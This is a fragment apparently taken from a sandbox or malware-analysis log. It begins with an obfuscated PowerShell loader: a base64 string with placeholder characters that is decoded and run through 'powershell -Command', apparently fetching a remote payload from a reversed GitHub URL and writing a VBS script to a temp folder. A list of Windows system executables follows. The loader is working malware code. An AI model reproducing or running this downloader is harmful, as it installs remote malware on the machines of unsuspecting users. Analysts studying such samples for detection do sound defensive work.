Q✑TQBl✑HQ✑a✑Bv✑GQ✑K✑✑n✑H✑✑cgBG✑FY✑SQ✑n✑Ck✑LgBJ✑G4✑dgBv✑Gs✑ZQ✑o✑CQ✑bgB1✑Gw✑b✑✑s✑C✑✑WwBv✑GI✑agBl✑GM✑d✑Bb✑F0✑XQ✑g✑Cg✑Jw✑0✑DY✑ZQBz✑GE✑QgBy✑GU✑dgBy✑GU✑Uw✑v✑G4✑aQBh✑G0✑LwBy✑GU✑d✑Bw✑Hk✑cgBj✑H✑✑VQ✑v✑Dg✑Nw✑1✑DE✑bwBh✑G8✑agBQ✑C8✑bQBv✑GM✑LgB0✑G4✑ZQB0✑G4✑bwBj✑HI✑ZQBz✑HU✑YgB1✑Gg✑d✑Bp✑Gc✑LgB3✑GE✑cg✑v✑C8✑OgBz✑H✑✑d✑B0✑Gg✑Jw✑g✑Cw✑I✑✑k✑E8✑W✑BQ✑Ho✑Rw✑g✑Cw✑I✑✑n✑FQ✑cgB1✑GU✑Jw✑g✑Ck✑I✑✑p✑✑==';$UrNXf = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $LxAae.replace('✑','A') ) ).replace('%lUsNQ%','').replace('%UWWsj%','C:\Users\test22\AppData\Local\Temp\bMfk.vbs');powershell -Command $UrNXf
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe